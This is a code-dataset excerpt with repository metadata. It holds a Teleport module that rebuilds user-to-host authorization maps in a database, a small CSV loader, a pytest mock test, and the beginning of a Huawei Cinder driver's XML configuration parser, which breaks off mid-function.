| column | dtype | range |
|---|---|---|
| hexsha | stringlengths | 40 – 40 |
| size | int64 | 1 – 1.03M |
| ext | stringclasses | 10 values |
| lang | stringclasses | 1 value |
| max_stars_repo_path | stringlengths | 3 – 239 |
| max_stars_repo_name | stringlengths | 5 – 130 |
| max_stars_repo_head_hexsha | stringlengths | 40 – 78 |
| max_stars_repo_licenses | sequencelengths | 1 – 10 |
| max_stars_count | int64 | 1 – 191k ⌀ |
| max_stars_repo_stars_event_min_datetime | stringlengths | 24 – 24 ⌀ |
| max_stars_repo_stars_event_max_datetime | stringlengths | 24 – 24 ⌀ |
| max_issues_repo_path | stringlengths | 3 – 239 |
| max_issues_repo_name | stringlengths | 5 – 130 |
| max_issues_repo_head_hexsha | stringlengths | 40 – 78 |
| max_issues_repo_licenses | sequencelengths | 1 – 10 |
| max_issues_count | int64 | 1 – 67k ⌀ |
| max_issues_repo_issues_event_min_datetime | stringlengths | 24 – 24 ⌀ |
| max_issues_repo_issues_event_max_datetime | stringlengths | 24 – 24 ⌀ |
| max_forks_repo_path | stringlengths | 3 – 239 |
| max_forks_repo_name | stringlengths | 5 – 130 |
| max_forks_repo_head_hexsha | stringlengths | 40 – 78 |
| max_forks_repo_licenses | sequencelengths | 1 – 10 |
| max_forks_count | int64 | 1 – 105k ⌀ |
| max_forks_repo_forks_event_min_datetime | stringlengths | 24 – 24 ⌀ |
| max_forks_repo_forks_event_max_datetime | stringlengths | 24 – 24 ⌀ |
| content | stringlengths | 1 – 1.03M |
| avg_line_length | float64 | 1 – 958k |
| max_line_length | int64 | 1 – 1.03M |
| alphanum_fraction | float64 | 0 – 1 |

(⌀ = column may be null)
4a1e2f745b1c09777ad708383a909a606bf11d79 | 23,608 | py | Python | server/www/teleport/webroot/app/model/policy.py | tinygg/teleport | 5ac759c707d355767a209e29becaadf250b0e366 | [
"Apache-2.0"
] | 640 | 2018-09-12T03:14:13.000Z | 2022-03-30T04:38:09.000Z | server/www/teleport/webroot/app/model/policy.py | tinygg/teleport | 5ac759c707d355767a209e29becaadf250b0e366 | [
"Apache-2.0"
] | 175 | 2018-09-10T19:52:20.000Z | 2022-03-30T04:37:30.000Z | server/www/teleport/webroot/app/model/policy.py | tinygg/teleport | 5ac759c707d355767a209e29becaadf250b0e366 | [
"Apache-2.0"
] | 230 | 2018-09-13T02:40:49.000Z | 2022-03-29T11:53:58.000Z |
# -*- coding: utf-8 -*-
from app.const import *
from app.base.logger import log
from app.base.db import get_db, SQL
from app.model import syslog
from app.base.utils import AttrDict, tp_timestamp_sec
def rebuild_ops_auz_map():
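    """Rebuild the operations authorization map.

    Loads policies, users, hosts, accounts and group memberships, expands
    every ops policy into concrete (user, account) pairs, and bulk-inserts
    the result into the ops_map table. Returns a TPE_* status code.
    """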
_users = {}
_hosts = {}
_accs = {}
_gusers = {}
_ghosts = {}
_gaccs = {}
_groups = {}
_policies = {}
_p_users = {}
_p_assets = {}
_map = []
db = get_db()
dbtp = db.table_prefix
db.exec('DELETE FROM {}ops_map'.format(dbtp))
s = SQL(get_db())
    # Load all policies
err = s.reset().select_from('ops_policy', ['id', 'rank', 'state'], alt_name='p').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_policies[i.id] = i
    # Load all users
err = s.reset().select_from('user', ['id', 'username', 'surname', 'state'], alt_name='u').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_users[i.id] = i
    # Load all hosts
err = s.reset().select_from('host', ['id', 'name', 'ip', 'router_ip', 'router_port', 'state'], alt_name='h').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_hosts[i.id] = i
    # Load all accounts
err = s.reset().select_from('acc', ['id', 'host_id', 'username', 'protocol_type', 'protocol_port', 'auth_type', 'state'], alt_name='a').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_accs[i.id] = i
    # Load all groups
err = s.reset().select_from('group', ['id', 'type', 'state'], alt_name='g').query()
if err != TPE_OK:
return err
for i in s.recorder:
_groups[i.id] = i
if i.type == TP_GROUP_USER:
_gusers[i.id] = []
elif i.type == TP_GROUP_HOST:
_ghosts[i.id] = []
elif i.type == TP_GROUP_ACCOUNT:
_gaccs[i.id] = []
    # Load all group membership mappings
err = s.reset().select_from('group_map', ['id', 'type', 'gid', 'mid'], alt_name='g').query()
if err != TPE_OK:
return err
for g in s.recorder:
if g.type == TP_GROUP_USER:
# if g.gid not in _gusers:
# _gusers[g.gid] = []
_gusers[g.gid].append(_users[g.mid])
elif g.type == TP_GROUP_HOST:
# if g.gid not in _ghosts:
# _ghosts[g.gid] = []
_ghosts[g.gid].append(_hosts[g.mid])
elif g.type == TP_GROUP_ACCOUNT:
# if g.gid not in _gaccs:
# _gaccs[g.gid] = []
_gaccs[g.gid].append(_accs[g.mid])
    # Load all policy detail entries
err = s.reset().select_from('ops_auz', ['id', 'policy_id', 'type', 'rtype', 'rid'], alt_name='o').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
    # Break each policy down into its operators and its target assets
for i in s.recorder:
if i.type == TP_POLICY_OPERATOR:
if i.policy_id not in _p_users:
_p_users[i.policy_id] = []
if i.rtype == TP_USER:
u = _users[i.rid]
_p_users[i.policy_id].append({
'u_id': i.rid,
'u_state': u.state,
'gu_id': 0,
'gu_state': 0,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'USER'
})
elif i.rtype == TP_GROUP_USER:
for u in _gusers[i.rid]:
_p_users[i.policy_id].append({
'u_id': u.id,
'u_state': u.state,
'gu_id': i.rid,
'gu_state': _groups[i.rid].state,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'gUSER'
})
else:
log.e('invalid operator type.\n')
return TPE_FAILED
elif i.type == TP_POLICY_ASSET:
if i.policy_id not in _p_assets:
_p_assets[i.policy_id] = []
if i.rtype == TP_ACCOUNT:
a = _accs[i.rid]
h = _hosts[a.host_id]
_p_assets[i.policy_id].append({
'a_id': i.rid,
'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
'h_state': h.state,
'gh_id': 0,
'gh_state': 0,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'ACC'
})
elif i.rtype == TP_GROUP_ACCOUNT:
for a in _gaccs[i.rid]:
h = _hosts[a.host_id]
_p_assets[i.policy_id].append({
'a_id': a.id,
'a_state': a.state,
'ga_id': i.rid,
'ga_state': _groups[i.rid].state,
'h_id': h.id,
'h_state': h.state,
'gh_id': 0,
'gh_state': 0,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'gACC'
})
elif i.rtype == TP_HOST:
for aid in _accs:
if _accs[aid].host_id == i.rid:
a = _accs[aid]
h = _hosts[i.rid]
_p_assets[i.policy_id].append({
'a_id': aid,
'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
'h_state': h.state,
'gh_id': 0,
'gh_state': 0,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'HOST'
})
elif i.rtype == TP_GROUP_HOST:
for h in _ghosts[i.rid]:
for aid in _accs:
if _accs[aid].host_id == h.id:
a = _accs[aid]
_p_assets[i.policy_id].append({
'a_id': aid,
'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
'h_state': h.state,
'gh_id': i.rid,
'gh_state': _groups[i.rid].state,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'gHOST'
})
else:
log.e('invalid asset type.\n')
return TPE_FAILED
else:
return TPE_FAILED
    # 3. Build all one-to-one mappings
for pid in _policies:
if pid not in _p_users:
continue
for u in _p_users[pid]:
if pid not in _p_assets:
continue
for a in _p_assets[pid]:
x = AttrDict()
x.update({
'p_id': pid,
'p_rank': _policies[pid].rank,
'p_state': _policies[pid].state
})
x.update(u)
x.update(a)
x.uni_id = '{}-{}-{}-{}-{}-{}-{}'.format(x.p_id, x.gu_id, x.u_id, x.gh_id, x.h_id, x.ga_id, x.a_id)
x.ua_id = 'u{}-a{}'.format(x.u_id, x.a_id)
x.policy_auth_type = TP_POLICY_AUTH_UNKNOWN
if u['auth_from_'] == 'USER' and a['auth_to_'] == 'ACC':
x.policy_auth_type = TP_POLICY_AUTH_USER_ACC
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gACC':
x.policy_auth_type = TP_POLICY_AUTH_USER_gACC
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_HOST
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_gHOST
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'ACC':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_ACC
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gACC':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_gACC
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_HOST
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_gHOST
_map.append(x)
if len(_map) == 0:
return TPE_OK
values = []
for i in _map:
v = '("{uni_id}","{ua_id}",{p_id},{p_rank},{p_state},{policy_auth_type},{u_id},{u_state},{gu_id},{gu_state},{h_id},{h_state},{gh_id},{gh_state},{a_id},{a_state},{ga_id},{ga_state},' \
'"{u_name}","{u_surname}","{h_name}","{ip}","{router_ip}",{router_port},"{a_name}",{protocol_type},{protocol_port})' \
''.format(uni_id=i.uni_id, ua_id=i.ua_id, p_id=i.p_id, p_rank=i.p_rank, p_state=i.p_state, policy_auth_type=i.policy_auth_type,
u_id=i.u_id, u_state=i.u_state, gu_id=i.gu_id, gu_state=i.gu_state, h_id=i.h_id, h_state=i.h_state,
gh_id=i.gh_id, gh_state=i.gh_state, a_id=i.a_id, a_state=i.a_state, ga_id=i.ga_id, ga_state=i.ga_state,
u_name=i.u_name, u_surname=i.u_surname, h_name=i.h_name, ip=i.ip, router_ip=i.router_ip, router_port=i.router_port,
a_name=i.a_name, protocol_type=i.protocol_type, protocol_port=i.protocol_port)
values.append(v)
sql = 'INSERT INTO `{dbtp}ops_map` (uni_id,ua_id,p_id,p_rank,p_state,policy_auth_type,u_id,u_state,gu_id,gu_state,h_id,h_state,gh_id,gh_state,a_id,a_state,ga_id,ga_state,' \
'u_name,u_surname,h_name,ip,router_ip,router_port,a_name,protocol_type,protocol_port) VALUES \n{values};' \
''.format(dbtp=dbtp, values=',\n'.join(values))
db_ret = db.exec(sql)
if not db_ret:
return TPE_DATABASE
return TPE_OK
def rebuild_audit_auz_map():
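    """Rebuild the audit authorization map.

    Same flow as rebuild_ops_auz_map(), but audit policies are defined at
    host granularity, so the account-related columns are omitted and the
    result is written to the audit_map table. Returns a TPE_* status code.
    """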
_users = {}
_hosts = {}
# _accs = {}
_gusers = {}
_ghosts = {}
# _gaccs = {}
_groups = {}
_policies = {}
_p_users = {}
_p_assets = {}
_map = []
db = get_db()
dbtp = db.table_prefix
db.exec('DELETE FROM {}audit_map'.format(dbtp))
s = SQL(get_db())
    # Load all policies
err = s.reset().select_from('audit_policy', ['id', 'rank', 'state'], alt_name='p').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_policies[i.id] = i
    # Load all users
err = s.reset().select_from('user', ['id', 'username', 'surname', 'state'], alt_name='u').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_users[i.id] = i
    # Load all hosts
err = s.reset().select_from('host', ['id', 'name', 'ip', 'router_ip', 'router_port', 'state'], alt_name='h').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_hosts[i.id] = i
    # # Load all accounts
# err = s.reset().select_from('acc', ['id', 'host_id', 'username', 'protocol_type', 'protocol_port', 'auth_type', 'state'], alt_name='a').query()
# if err != TPE_OK:
# return err
# if 0 == len(s.recorder):
# return TPE_OK
# for i in s.recorder:
# _accs[i.id] = i
    # Load all groups
err = s.reset().select_from('group', ['id', 'type', 'state'], alt_name='g').query()
if err != TPE_OK:
return err
for i in s.recorder:
_groups[i.id] = i
if i.type == TP_GROUP_USER:
_gusers[i.id] = []
elif i.type == TP_GROUP_HOST:
_ghosts[i.id] = []
# elif i.type == TP_GROUP_ACCOUNT:
# _gaccs[i.id] = []
    # Load all group membership mappings
err = s.reset().select_from('group_map', ['id', 'type', 'gid', 'mid'], alt_name='g').query()
if err != TPE_OK:
return err
for g in s.recorder:
if g.type == TP_GROUP_USER:
# if g.gid not in _gusers:
# _gusers[g.gid] = []
_gusers[g.gid].append(_users[g.mid])
elif g.type == TP_GROUP_HOST:
# if g.gid not in _ghosts:
# _ghosts[g.gid] = []
_ghosts[g.gid].append(_hosts[g.mid])
# elif g.type == TP_GROUP_ACCOUNT:
# # if g.gid not in _gaccs:
# # _gaccs[g.gid] = []
# _gaccs[g.gid].append(_accs[g.mid])
    # Load all policy detail entries
err = s.reset().select_from('audit_auz', ['id', 'policy_id', 'type', 'rtype', 'rid'], alt_name='o').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
    # Break each policy down into its operators and its target assets
for i in s.recorder:
if i.type == TP_POLICY_OPERATOR:
if i.policy_id not in _p_users:
_p_users[i.policy_id] = []
if i.rtype == TP_USER:
u = _users[i.rid]
_p_users[i.policy_id].append({
'u_id': i.rid,
'u_state': u.state,
'gu_id': 0,
'gu_state': 0,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'USER'
})
elif i.rtype == TP_GROUP_USER:
for u in _gusers[i.rid]:
_p_users[i.policy_id].append({
'u_id': u.id,
'u_state': u.state,
'gu_id': i.rid,
'gu_state': _groups[i.rid].state,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'gUSER'
})
else:
log.e('invalid operator type.\n')
return TPE_FAILED
elif i.type == TP_POLICY_ASSET:
if i.policy_id not in _p_assets:
_p_assets[i.policy_id] = []
# if i.rtype == TP_ACCOUNT:
# a = _accs[i.rid]
# h = _hosts[a.host_id]
# _p_assets[i.policy_id].append({
# 'a_id': i.rid,
# 'a_state': a.state,
# 'ga_id': 0,
# 'ga_state': 0,
# 'h_id': h.id,
# 'h_state': h.state,
# 'gh_id': 0,
# 'gh_state': 0,
# 'a_name': a.username,
# 'protocol_type': a.protocol_type,
# 'protocol_port': a.protocol_port,
# 'h_name': h.name,
# 'ip': h.ip,
# 'router_ip': h.router_ip,
# 'router_port': h.router_port,
# 'auth_to_': 'ACC'
# })
# elif i.rtype == TP_GROUP_ACCOUNT:
# for a in _gaccs[i.rid]:
# h = _hosts[a.host_id]
# _p_assets[i.policy_id].append({
# 'a_id': a.id,
# 'a_state': a.state,
# 'ga_id': i.rid,
# 'ga_state': _groups[i.rid].state,
# 'h_id': h.id,
# 'h_state': h.state,
# 'gh_id': 0,
# 'gh_state': 0,
# 'a_name': a.username,
# 'protocol_type': a.protocol_type,
# 'protocol_port': a.protocol_port,
# 'h_name': h.name,
# 'ip': h.ip,
# 'router_ip': h.router_ip,
# 'router_port': h.router_port,
# 'auth_to_': 'gACC'
# })
# el
if i.rtype == TP_HOST:
# for aid in _accs:
# if _accs[aid].host_id == i.rid:
# a = _accs[aid]
h = _hosts[i.rid]
_p_assets[i.policy_id].append({
# 'a_id': aid,
# 'a_state': a.state,
# 'ga_id': 0,
# 'ga_state': 0,
'h_id': h.id,
# 'h_state': h.state,
'gh_id': 0,
# 'gh_state': 0,
# 'a_name': a.username,
# 'protocol_type': h.protocol_type,
# 'protocol_port': h.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'HOST'
})
elif i.rtype == TP_GROUP_HOST:
for h in _ghosts[i.rid]:
# for aid in _accs:
# if _accs[aid].host_id == h.id:
# a = _accs[aid]
_p_assets[i.policy_id].append({
# 'a_id': aid,
# 'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
# 'h_state': h.state,
'gh_id': i.rid,
# 'gh_state': _groups[i.rid].state,
# 'a_name': a.username,
# 'protocol_type': a.protocol_type,
# 'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'gHOST'
})
else:
log.e('invalid asset type.\n')
return TPE_FAILED
else:
return TPE_FAILED
    # 3. Build all one-to-one mappings
for pid in _policies:
if pid not in _p_users:
continue
for u in _p_users[pid]:
if pid not in _p_assets:
continue
for a in _p_assets[pid]:
x = AttrDict()
x.update({
'p_id': pid,
'p_rank': _policies[pid].rank,
'p_state': _policies[pid].state
})
x.update(u)
x.update(a)
x.uni_id = '{}-{}-{}-{}-{}'.format(x.p_id, x.gu_id, x.u_id, x.gh_id, x.h_id)
x.uh_id = 'u{}-h{}'.format(x.u_id, x.h_id)
x.policy_auth_type = TP_POLICY_AUTH_UNKNOWN
# if u['auth_from_'] == 'USER' and a['auth_to_'] == 'ACC':
# x.policy_auth_type = TP_POLICY_AUTH_USER_ACC
# elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gACC':
# x.policy_auth_type = TP_POLICY_AUTH_USER_gACC
# el
if u['auth_from_'] == 'USER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_HOST
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_gHOST
# elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'ACC':
# x.policy_auth_type = TP_POLICY_AUTH_gUSER_ACC
# elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gACC':
# x.policy_auth_type = TP_POLICY_AUTH_gUSER_gACC
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_HOST
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_gHOST
else:
log.w('invalid policy data.\n')
continue
_map.append(x)
if len(_map) == 0:
return TPE_OK
values = []
for i in _map:
v = '("{uni_id}","{uh_id}",{p_id},{p_rank},{p_state},{policy_auth_type},{u_id},{u_state},{gu_id},{gu_state},{h_id},{gh_id},' \
'"{u_name}","{u_surname}","{h_name}","{ip}","{router_ip}",{router_port})' \
''.format(uni_id=i.uni_id, uh_id=i.uh_id, p_id=i.p_id, p_rank=i.p_rank, p_state=i.p_state, policy_auth_type=i.policy_auth_type,
u_id=i.u_id, u_state=i.u_state, gu_id=i.gu_id, gu_state=i.gu_state, h_id=i.h_id,gh_id=i.gh_id,
u_name=i.u_name, u_surname=i.u_surname, h_name=i.h_name, ip=i.ip, router_ip=i.router_ip, router_port=i.router_port)
values.append(v)
sql = 'INSERT INTO `{dbtp}audit_map` (uni_id,uh_id,p_id,p_rank,p_state,policy_auth_type,u_id,u_state,gu_id,gu_state,h_id,gh_id,' \
'u_name,u_surname,h_name,ip,router_ip,router_port) VALUES \n{values};' \
''.format(dbtp=dbtp, values=',\n'.join(values))
db_ret = db.exec(sql)
if not db_ret:
return TPE_DATABASE
return TPE_OK
def rebuild_auz_map():
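    """Rebuild both the ops and the audit authorization maps."""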
ret = rebuild_ops_auz_map()
if ret != TPE_OK:
return ret
return rebuild_audit_auz_map()
| 39.021488 | 192 | 0.432862 |
4a1e30b861e4b677179f33310783146a2cfa3ca6 | 184 | py | Python | DataLoader/_load_polarity_file.py | vd1371/CBSA | f2b3f03c91ccd9ec02c2331f43573d7d6e72fd47 | [
"MIT"
] | null | null | null | DataLoader/_load_polarity_file.py | vd1371/CBSA | f2b3f03c91ccd9ec02c2331f43573d7d6e72fd47 | [
"MIT"
] | null | null | null | DataLoader/_load_polarity_file.py | vd1371/CBSA | f2b3f03c91ccd9ec02c2331f43573d7d6e72fd47 | [
"MIT"
] | null | null | null |
import os
import pandas as pd
def load_polarity_file():
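    """Return ./Data/Polarities.csv as a DataFrame, or None if the file is missing."""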
    df = None
    if os.path.exists("./Data/Polarities.csv"):
        df = pd.read_csv("./Data/Polarities.csv", index_col=0)
    return df
| 18.4 | 58 | 0.701087 |
4a1e3102e54eca6489dbed7e77be1985ccff63a1 | 348 | py | Python | test/unit/test_handlers.py | Spendency/cw-logs-to-lambda | 24dcd104ddbae159f2568d0672d05731b9884504 | [
"MIT"
] | 2 | 2019-04-17T17:44:31.000Z | 2020-08-04T02:49:40.000Z | test/unit/test_handlers.py | Spendency/cw-logs-to-lambda | 24dcd104ddbae159f2568d0672d05731b9884504 | [
"MIT"
] | null | null | null | test/unit/test_handlers.py | Spendency/cw-logs-to-lambda | 24dcd104ddbae159f2568d0672d05731b9884504 | [
"MIT"
] | 1 | 2021-03-24T08:27:26.000Z | 2021-03-24T08:27:26.000Z |
import pytest
import handlers
import lambdahelpers
import requests
import test_constants
def test_logs_to_lambda(mocker):
    mocker.patch.object(lambdahelpers, 'send_message_array')
    handlers.logs_to_lambda(test_constants.AWS_LOG_EVENT, None)
    lambdahelpers.send_message_array.assert_called_with(test_constants.EXTRACTED_LOG_EVENTS_JSON)
| 26.769231 | 97 | 0.850575 |
4a1e319d1efb2ef1996f7531a9497c34260b3a08 | 22,062 | py | Python | Cinder/Wallaby/huawei_conf.py | bingyanh/OpenStack_Driver | 8c94f6f86a5ebb1e663aa73df0847cfad09d2960 | [
"Apache-2.0"
] | 14 | 2019-05-25T01:55:50.000Z | 2021-02-23T06:54:06.000Z | Cinder/Wallaby/huawei_conf.py | bingyanh/OpenStack_Driver | 8c94f6f86a5ebb1e663aa73df0847cfad09d2960 | [
"Apache-2.0"
] | 4 | 2019-12-31T08:46:30.000Z | 2021-10-30T09:27:58.000Z | Cinder/Wallaby/huawei_conf.py | bingyanh/OpenStack_Driver | 8c94f6f86a5ebb1e663aa73df0847cfad09d2960 | [
"Apache-2.0"
] | 17 | 2019-07-31T03:13:07.000Z | 2022-02-21T08:09:15.000Z |
# Copyright (c) 2016 Huawei Technologies Co., Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Set Huawei private configuration into Configuration object.
For conveniently get private configuration. We parse Huawei config file
and set every property into Configuration object as an attribute.
"""
import base64
from xml.etree import ElementTree as ET
import os
import re
import six
from oslo_log import log as logging
from cinder import exception
from cinder.i18n import _
from cinder.volume.drivers.huawei import constants
LOG = logging.getLogger(__name__)
class HuaweiConf(object):
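    """Parse the Huawei driver XML configuration file.

    update_config_value() parses the XML file named by
    conf.cinder_huawei_conf_file and attaches every recognised option to the
    Configuration object. Illustrative element paths (the values shown here
    are placeholders; only the element names come from the parsing code
    below):

        Storage/RestURL       e.g. https://1.2.3.4:8088/...
        Storage/UserName      login user (rewritten base64-obfuscated on first read)
        Storage/UserPassword  login password (same obfuscation)
        Storage/Product       must be one of constants.VALID_PRODUCT
        LUN/StoragePool       semicolon-separated pool names
    """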
def __init__(self, conf):
self.conf = conf
self.last_modify_time = None
def update_config_value(self):
file_time = os.stat(self.conf.cinder_huawei_conf_file).st_mtime
if self.last_modify_time == file_time:
return
self.last_modify_time = file_time
tree = ET.parse(self.conf.cinder_huawei_conf_file)
xml_root = tree.getroot()
self._encode_authentication(tree, xml_root)
attr_funcs = (
self._san_address,
self._san_user,
self._san_password,
self._san_vstore,
self._san_product,
self._ssl_cert_path,
self._ssl_cert_verify,
self._iscsi_info,
self._fc_info,
self._hyper_pair_sync_speed,
self._replication_pair_sync_speed,
self._hypermetro_devices,
self._replication_devices,
self._lun_type,
self._lun_write_type,
self._lun_prefetch,
self._storage_pools,
self._force_delete_volume,
self._lun_copy_speed,
self._lun_copy_mode,
self._lun_copy_wait_interval,
self._lun_timeout,
self._get_minimum_fc_initiator,
self._hyper_enforce_multipath,
self._rollback_speed,
)
for f in attr_funcs:
f(xml_root)
def _encode_authentication(self, tree, xml_root):
name_node = xml_root.find('Storage/UserName')
pwd_node = xml_root.find('Storage/UserPassword')
vstore_node = xml_root.find('Storage/vStoreName')
need_encode = False
if name_node is not None and not name_node.text.startswith('!$$$'):
encoded = base64.b64encode(six.b(name_node.text)).decode()
name_node.text = '!$$$' + encoded
need_encode = True
if pwd_node is not None and not pwd_node.text.startswith('!$$$'):
encoded = base64.b64encode(six.b(pwd_node.text)).decode()
pwd_node.text = '!$$$' + encoded
need_encode = True
if vstore_node is not None and not vstore_node.text.startswith('!$$$'):
encoded = base64.b64encode(six.b(vstore_node.text)).decode()
vstore_node.text = '!$$$' + encoded
need_encode = True
if need_encode:
tree.write(self.conf.cinder_huawei_conf_file, 'UTF-8')
def _san_address(self, xml_root):
text = xml_root.findtext('Storage/RestURL')
if not text:
msg = _("RestURL is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
addrs = list(set([x.strip() for x in text.split(';') if x.strip()]))
setattr(self.conf, 'san_address', addrs)
def _san_user(self, xml_root):
text = xml_root.findtext('Storage/UserName')
if not text:
msg = _("UserName is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
user = base64.b64decode(six.b(text[4:])).decode()
setattr(self.conf, 'san_user', user)
def _san_password(self, xml_root):
text = xml_root.findtext('Storage/UserPassword')
if not text:
msg = _("UserPassword is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
pwd = base64.b64decode(six.b(text[4:])).decode()
setattr(self.conf, 'san_password', pwd)
def _san_vstore(self, xml_root):
vstore = None
text = xml_root.findtext('Storage/vStoreName')
if text:
vstore = base64.b64decode(six.b(text[4:])).decode()
setattr(self.conf, 'vstore_name', vstore)
def _ssl_cert_path(self, xml_root):
text = xml_root.findtext('Storage/SSLCertPath')
setattr(self.conf, 'ssl_cert_path', text)
def _ssl_cert_verify(self, xml_root):
value = False
text = xml_root.findtext('Storage/SSLCertVerify')
if text:
if text.lower() in ('true', 'false'):
value = text.lower() == 'true'
else:
msg = _("SSLCertVerify configured error.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'ssl_cert_verify', value)
def _set_extra_constants_by_product(self, product):
extra_constants = {}
if product == 'Dorado':
extra_constants['QOS_SPEC_KEYS'] = (
'maxIOPS', 'maxBandWidth', 'IOType')
extra_constants['QOS_IOTYPES'] = ('2',)
extra_constants['SUPPORT_LUN_TYPES'] = ('Thin',)
extra_constants['DEFAULT_LUN_TYPE'] = 'Thin'
extra_constants['SUPPORT_CLONE_MODE'] = ('fastclone', 'luncopy')
else:
extra_constants['QOS_SPEC_KEYS'] = (
'maxIOPS', 'minIOPS', 'minBandWidth',
'maxBandWidth', 'latency', 'IOType')
extra_constants['QOS_IOTYPES'] = ('0', '1', '2')
extra_constants['SUPPORT_LUN_TYPES'] = ('Thick', 'Thin')
extra_constants['DEFAULT_LUN_TYPE'] = 'Thick'
extra_constants['SUPPORT_CLONE_MODE'] = ('luncopy',)
for k in extra_constants:
setattr(constants, k, extra_constants[k])
def _san_product(self, xml_root):
text = xml_root.findtext('Storage/Product')
if not text:
msg = _("SAN product is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
product = text.strip()
if product not in constants.VALID_PRODUCT:
msg = _("Invalid SAN product %(text)s, SAN product must be "
"in %(valid)s.") % {'text': product,
'valid': constants.VALID_PRODUCT}
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
self._set_extra_constants_by_product(product)
setattr(self.conf, 'san_product', product)
def _lun_type(self, xml_root):
lun_type = constants.DEFAULT_LUN_TYPE
text = xml_root.findtext('LUN/LUNType')
if text:
lun_type = text.strip()
if lun_type not in constants.LUN_TYPE_MAP:
msg = _("Invalid lun type %s is configured.") % lun_type
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if lun_type not in constants.SUPPORT_LUN_TYPES:
msg = _("%(array)s array requires %(valid)s lun type, "
"but %(conf)s is specified."
) % {'array': self.conf.san_product,
'valid': constants.SUPPORT_LUN_TYPES,
'conf': lun_type}
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'lun_type', constants.LUN_TYPE_MAP[lun_type])
def _lun_write_type(self, xml_root):
text = xml_root.findtext('LUN/WriteType')
if text:
write_type = text.strip()
if write_type:
setattr(self.conf, 'write_type', write_type)
def _lun_prefetch(self, xml_root):
node = xml_root.find('LUN/Prefetch')
if node is not None:
if 'Type' in node.attrib:
prefetch_type = node.attrib['Type'].strip()
setattr(self.conf, 'prefetch_type', prefetch_type)
if 'Value' in node.attrib:
prefetch_value = node.attrib['Value'].strip()
setattr(self.conf, 'prefetch_value', prefetch_value)
def _storage_pools(self, xml_root):
text = xml_root.findtext('LUN/StoragePool')
if not text:
msg = _('Storage pool is not configured.')
LOG.error(msg)
